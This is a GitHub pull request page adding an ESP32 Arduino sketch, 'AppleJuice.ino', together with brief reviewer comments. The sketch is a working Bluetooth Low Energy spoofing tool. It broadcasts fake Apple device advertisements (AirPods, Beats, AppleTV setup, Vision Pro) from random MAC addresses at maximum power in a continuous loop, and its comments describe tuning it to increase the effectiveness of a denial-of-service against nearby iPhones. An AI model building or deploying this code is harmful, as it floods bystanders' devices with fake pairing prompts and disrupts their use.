This repository has been archived by the owner on Aug 22, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 149
Create AppleJuice.ino #145
Closed
Closed
Changes from all commits
Commits
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,177 @@ | ||
// This example takes heavy inpsiration from the ESP32 example by ronaldstoner | ||
// Based on the previous work of chipik / _hexway / ECTO-1A & SAY-10 | ||
// See the README for more info | ||
#include <Arduino.h> | ||
#include <BLEDevice.h> | ||
#include <BLEUtils.h> | ||
#include <BLEServer.h> | ||
|
||
BLEAdvertising *pAdvertising; // global variable | ||
uint32_t delayMilliseconds = 1000; | ||
|
||
/* | ||
These are audio devices: wireless headphones / earbuds | ||
It seems these need a shorter range between ESP & iDevice | ||
*/ | ||
const uint8_t DEVICES[][31] = { | ||
// Airpods | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x02, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Airpods Pro | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0e, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Airpods Max | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0a, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Airpods Gen 2 | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0f, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Airpods Gen 3 | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x13, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Airpods Pro Gen 2 | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x14, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Power Beats | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x03, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Power Beats Pro | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0b, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Solo Pro | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0c, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Studio Buds | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x11, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Flex | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x10, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats X | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x05, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Solo 3 | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x06, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Studio 3 | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x09, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Studio Pro | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x17, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Betas Fit Pro | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x12, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
// Beats Studio Buds Plus | ||
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x16, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}, | ||
}; | ||
|
||
/* | ||
These are more general home devices | ||
It seems these can work over long distances, especially AppleTV Setup | ||
*/ | ||
const uint8_t SHORT_DEVICES[][23] = { | ||
// AppleTV Setup | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x01, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV Pair | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x06, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV New User | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x20, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV AppleID Setup | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x2b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV Wireless Audio Sync | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0xc0, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV Homekit Setup | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0d, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV Keyboard Setup | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x13, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// AppleTV Connecting to Network | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x27, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// Homepod Setup | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// Setup New Phone | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x09, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// Transfer Number | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x02, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// TV Color Balance | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x1e, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
// Vision Pro | ||
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x24, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00}, | ||
}; | ||
|
||
void setup() { | ||
Serial.begin(115200); | ||
Serial.println("Starting ESP32 BLE"); | ||
|
||
BLEDevice::init("AirPods 69"); | ||
|
||
// Increase BLE Power to 9dBm (MAX) | ||
esp_ble_tx_power_set(ESP_BLE_PWR_TYPE_ADV, ESP_PWR_LVL_P9); | ||
|
||
// Create the BLE Server | ||
BLEServer *pServer = BLEDevice::createServer(); | ||
pAdvertising = pServer->getAdvertising(); | ||
|
||
// seems we need to init it with an address in setup() step. | ||
esp_bd_addr_t null_addr = {0xFE, 0xED, 0xC0, 0xFF, 0xEE, 0x69}; | ||
pAdvertising->setDeviceAddress(null_addr, BLE_ADDR_TYPE_RANDOM); | ||
} | ||
|
||
void loop() { | ||
|
||
// First generate fake random MAC | ||
esp_bd_addr_t dummy_addr = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; | ||
for (int i = 0; i < 6; i++){ | ||
dummy_addr[i] = random(256); | ||
|
||
// It seems for some reason first 4 bits | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Is this code relevant? otherwise could be removed |
||
// Need to be high (aka 0b1111), so we | ||
// OR with 0xF0 | ||
//if (i == 0){ | ||
//dummy_addr[i] |= 0xF0; | ||
//} | ||
} | ||
|
||
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData(); | ||
|
||
// Randomly pick data from one of the devices | ||
// First decide short or long | ||
// 0 = long (headphones), 1 = short (misc stuff like Apple TV) | ||
int device_choice = random(2); | ||
//int device_choice = 1; | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. commented out code |
||
if (device_choice == 0){ | ||
int index = random(17); | ||
oAdvertisementData.addData(std::string((char*)DEVICES[index], 31)); | ||
} else { | ||
int index = random(13); | ||
oAdvertisementData.addData(std::string((char*)SHORT_DEVICES[index], 23)); | ||
} | ||
|
||
/* Page 191 of Apple's "Accessory Design Guidelines for Apple Devices (Release R20)" recommends to use only one of | ||
the three advertising PDU types when you want to connect to Apple devices. | ||
// 0 = ADV_TYPE_IND, | ||
// 1 = ADV_TYPE_SCAN_IND | ||
// 2 = ADV_TYPE_NONCONN_IND | ||
|
||
Randomly using any of these PDU types may increase detectability of spoofed packets. | ||
|
||
What we know for sure: | ||
- AirPods Gen 2: this advertises ADV_TYPE_SCAN_IND packets when the lid is opened and ADV_TYPE_NONCONN_IND when in pairing mode (when the rear case btton is held). | ||
Consider using only these PDU types if you want to target Airpods Gen 2 specifically. | ||
*/ | ||
|
||
int adv_type_choice = random(3); | ||
if (adv_type_choice == 0){ | ||
pAdvertising->setAdvertisementType(ADV_TYPE_IND); | ||
} else if (adv_type_choice == 1){ | ||
pAdvertising->setAdvertisementType(ADV_TYPE_SCAN_IND); | ||
} else { | ||
pAdvertising->setAdvertisementType(ADV_TYPE_NONCONN_IND); | ||
} | ||
|
||
// Set the device address, advertisement data | ||
pAdvertising->setDeviceAddress(dummy_addr, BLE_ADDR_TYPE_RANDOM); | ||
pAdvertising->setAdvertisementData(oAdvertisementData); | ||
|
||
// Set advertising interval | ||
/* According to Apple' Technical Q&A QA1931 (https://developer.apple.com/library/archive/qa/qa1931/_index.html), Apple recommends | ||
an advertising interval of 20ms to developers who want to maximize the probability of their BLE accessories to be discovered by iOS. | ||
|
||
These lines of code fixes the interval to 20ms. Enabling these MIGHT increase the effectiveness of the DoS. Note this has not undergone thorough testing. | ||
*/ | ||
|
||
//pAdvertising->setMinInterval(0x20); | ||
//pAdvertising->setMaxInterval(0x20); | ||
//pAdvertising->setMinPreferred(0x20); | ||
//pAdvertising->setMaxPreferred(0x20); | ||
|
||
// Start advertising | ||
Serial.println("Sending Advertisement..."); | ||
pAdvertising->start(); | ||
delay(delayMilliseconds); // delay for delayMilliseconds ms | ||
pAdvertising->stop(); | ||
} |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There is a pull request that is likely to go in that generates random macs, could we possible use that in the future to not duplicate code?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
yes we can do that
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great coordination RoI3ot
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Make sure to keep the first 2 bits the same as it can cause issues as it is the esp manufacture ID
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
yes